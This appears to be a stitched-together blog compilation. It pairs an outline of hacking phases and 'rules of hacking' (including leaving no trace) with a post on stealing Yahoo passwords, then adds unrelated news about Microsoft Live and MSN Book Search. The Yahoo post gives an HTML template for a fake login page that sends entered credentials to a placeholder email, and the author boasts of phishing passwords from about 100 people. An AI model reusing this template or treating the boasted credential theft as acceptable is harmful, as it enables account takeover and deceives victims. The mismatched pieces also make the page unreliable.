Anatomy Of Hack

There are some generic ways that a hacker follows to hack in to the private network. In this article I described a generic way that has been long followed by the most of the hackers all around the world. Today’s private networks are hard and very much secured from outside so that it becomes very difficult for the hackers to get in to the network, but once you will get a small hole into the corporate firewall certainly you can hack into the network. Since the rest of the internal network is very soft. This is very similar to the egg shell which is very hard from outside but very soft from inside.
Foot printing
the first step that a hacker follows in hacking is Foot printing. Where hacker identifies that the target that he needs to attack. In this step he finds the list of available computers that can be hacked. In this step hacker may enumerate the computers present on his network or he may get the IP of the target system by some other means. He may get the IP of target system from some of the internal employee.

Scanning
In second step hacker scans the target system. Like he scans the ports, finds the MAC-address of the target system

Information Gathering
the third step of hacking is Information Gathering. in this stage hacker tries to get as much information as possible about the target system. he finds the operating system running on the target machine, services running on the target machine that can be exploited and much more. This is the right step for the hacker to get some of the user name that has probably the blank password or a password that can be easily guessed.

Gaining Access
the access gaining step is the next step that a hackers does after the Information gathering phase. He gains access on the target machine by means of some exploits which may be the blank/default password of some user or it may be application vulnerability. Like buffer overflow exploit that has been used by hacker most of the time to gain access on the vulnerable machines. In history the access gained using many technique including XSS (cross site scripting) and SQL injection attack.

Escalating Privilege
In case when the access gained in previous step is not privileged enough, hacker tries to escalate his privileges by means of exploiting the application level vulnerability. This is one of the most difficult phases of the hacking.

Pilfering
once the hacker got the right privilege on the target machine he starts pilfering the required information from the machine. In this phase hacker may harm the target machine.


Denial of Service
when hackers not able to gain access on the target machine or he is not able to escalate his privileges he attacks the system for denial of service. This hacker does when he gets frustrated of the hardness of system. This is not going to benefit the hacker in any sense.

Reference
http://www.microsoft.com/technet/technetmag/issues/2005/01/AnatomyofaHack/

Rule of Hacking

There are some rules i believe that must to be followed when you are Hacking.
follow these dont's and do's of hacking.

Dont's of Hacking

1. Do not do in same way as others do.
2. Do not use tool for hacking unless you know its complete working.
3. Do not leave any trace.
4. Do not delete or change any data which can harm or causes loss to victim.(Ethically do not harm your victim)

Do's of hacking

1. Do in all possible ways
   

Yahoo Hacking Bot

Hi Guys,
Today I am going to discuss about what I did on last week. Before this let me tell you that I am very much interested in hacking. I mean I want to learn hacking techniques that was used in history by other hackers. In this series, in previous week I was searching about what are all the techniques that were used for the hackers to hack the online web mail accounts like Yahoo.

So I googled and found a very few techniques that were used. The most of the techniques are all known to me like Key-loggers, Dummy pages and Social Engineering. Last week using social engineering technique I got the password of nearly 100 people on the net. Now let me tell you that how these three techniques works and how can you defend yourself.

Key-Loggers

The key loggers are very cheap kind of hacking utility that is used by script kiddies. It’s software that logs every key press on a particular machine. So using this you can record the keys and u can get password of any kind of form based authentication scheme, Irrespective of the authentication technique used by your server program. Form based authentication means the authentication scheme is scheme that takes user name and password from user.

So may be your friend will install a key logger on your machine when you are away from your machine (that is left open). Key loggers are can also be presents on Internet Café Machine.

Dummy Pages

Dummy pages are the false login page that looks very similar to original page and that is having some different Action value. Means it will be a fake HTML form page whose post method will be set to post and action will be configured in such a way that when you submit the information it will be sent to some e-mail Id. This may be the case that you will try to login on these pages and your password will be posted to your friend’s (hacker) email.

Here is a simple example of Dummy page

<form action="Your SMTP URL" method="POST">
<input type="Hidden" name="to" value="Your email Id">
<input type="Hidden" name="subject" value="Subject of email ">
<input type="text" name="user" value="">
<input type="text" name="pass" value="">
<input type="submit" name="submitbutton" value="">
</form>

Social Engineering

The last method that I come across was a social Engineering which deceives the user by telling them a very easy method to hack yahoo which describes like this.

1.First send a letter to hack_mit_bot@yahoo.com, second within the
Subject heading place the word "Password".
2. Then in the text field place the YahooID of the person that you
want to hack in small letters.
3.Then and place your own yahoo account information such as: "My
login:My password" (a semicolon makes it easier for the bot to
recognize). This way the bot can verify that your account actually
exists. And then supplies you with the password for the person's
account that you want it for. Here is example:

To: hack_mit_bot@yahoo.com
Cc:
Bcc:
Subject: Password

YourYahooID@yahoo.co.in:>

So all the people who want to hack someone Yahoo ID will be hacked itself.

Can you believe this, this method is posted on the internet few years back but still I got many Idiots who sent me their password.

Reality

If anyone a claim that he can get your yahoo password is either dam fool or he is dam intelligent who can really hack the existing algorithms. Why I am telling this because the password stored on the yahoo server is neither exactly your plain password nor its encrypted password, but it’s the hash of your password that can not be decrypted back unless you crack it by some brute force attack. So guys even the yahoo administrator can not get your password.

But if someone still hacking your yahoo mail it’s totally due to your mistake. I mean either you logged on the machine which has keyboard logger or you entered your password on some dummy page.

So be claver enough that someone can not hack your password.

Windows Live

Microsoft's foray into hosted applications will have an initially minimal impact on the software vendor, but will certainly affect some of its main competitors, industry analysts told vnunet.com.
"This is more a swing of the pendulum," said Rob Helm, director of research at analyst firm Directions on Microsoft.
"In 2000 the pendulum was swinging towards hosted services. Two years later it was swinging back. Now Microsoft is going to make another run at it."
Microsoft unveiled its Live Software initiative on Tuesday at a media event in San Francisco. The strategy will see the launch of the new Office Live and Windows Live products.
Both are mostly free and supported by advertisements, and are offered as an online service through a browser.
Users will be able to access the applications on any device with a browser, ranging from mobile phones to PDAs and desktop PCs.
In the short term, however, the initiative will mostly be a rebranding of existing Microsoft services including Hotmail and MSN Messenger.
The two will be released under the Live Mail (video demonstration) and Live Messenger (video demonstration) brands respectively. Similarly Microsoft's Small Business Centre will become Office Live.
"It's mostly a branding change and an overall statement of direction," said Helm. But by making the services available free of charge and supported by advertisements, Microsoft is stepping up the competition with Google and Yahoo.
However, unlike Google and Yahoo, Microsoft does not rely solely on advertising revenues to stay in business. This not only makes it a low risk best for the software provider, but offers a shot at ruining Google's and Yahoo's business.
"Even if Microsoft doesn't win, it's possible for others to lose," said Helm.
Microsoft launched a big push towards hosted applications in 2000, but the doomed Hailstorm project faced many obstacles.
Users did not trust Microsoft, and the low adoption rate of broadband connections limited the appeal of software that required users to be constantly online. As the internet bubble burst, Microsoft quietly folded the initiative.
Trust will be a major hurdle for Microsoft once again, according to Charlene Li, principal analyst for devices, media and marketing at Forrester Research.

Microsoft's Another Tactic

US software colossus Microsoft announced plans on Wednesday to launch an online library of books and other written works.
A "beta" version of MSN Book Search will go into service online next year, Microsoft said in a written release.
"We are excited to be working with libraries worldwide to digitize and index information from the world's printed materials," said Christopher Payne, corporate vice president of MSN Search.
"We believe people will benefit from the ability to not just view a page, but to easily act on that data in contextually relevant ways, both online in the search experience and in the applications they are using," he said.
Microsoft will start its library with books in the public domain then expand it to include other works, according to the company.
Microsoft's digital text compilation will consist primarily of material that is not copyrighted and it will strive to work out deals with the owners of written works before including them in the online library, the company said.
Microsoft was evidently trying to avoid the kind of criticism and contention its Internet rival Google provoked with a plan to amass all the world's books in an online archive.
Google unveiled its project, "Google Print," in October last year.
Google suspended the plan in August after being lambasted internationally by authors, traditional libraries and publishing houses that claimed copyrights were being threatened.
Google's print production manager Adam Smith said at the time that Google would not scan any more copyrighted books until next month, to give publishers a chance to figure out what books they want kept from the planned online library.
In April, 19 European national libraries announced a multi-million euro counter-offensive aimed at blocking Google's quest to create a global virtual library.
The alliance, organized by France's national library, formed after Michigan University and four other top libraries -- Harvard, Stanford, New York Public Library and the Bodleian in Oxford -- made a deal with Google to digitize millions of their books and make them freely available online.
Google has consulted with publishers, authors and trade organizations to assuage concerns about copyrights, according to Smith.
Google invited publishers to provide lists of copyrighted works they want logged in the online library so the search engine can refer potential readers their way to buy the books in one form or another.
Google also offered to keep publishers and authors updated on interest in their books and share revenue from "contextual advertising."
The Google Print project rattled the cultural establishment in Paris, raising fears that French language and ideas could be just sidelined on the World Wide Web, already dominated by English.
French President Jacques Chirac, at one point, asked Culture Minister Renaud Donnedieu de Vabres and France's National Library president Jean-Noel Jeanneney to study how collections in libraries in France and Europe could be more widely and more rapidly distributed via Internet.
Jeanneney said at the time that Google's plan confirmed "the risk of a crushing American domination in the definition of how future generations conceive the world."
The alliance opposing Google's plan included national libraries in Austria, Belgium, the Czech Republic, Denmark, Estonia, Finland, France, Germany, Greece, Hungary, Italy, Lithuania, Luxembourg, the Netherlands, Poland, Slovenia, Slovakia, Spain and Sweden. This story has been viewed 129 times.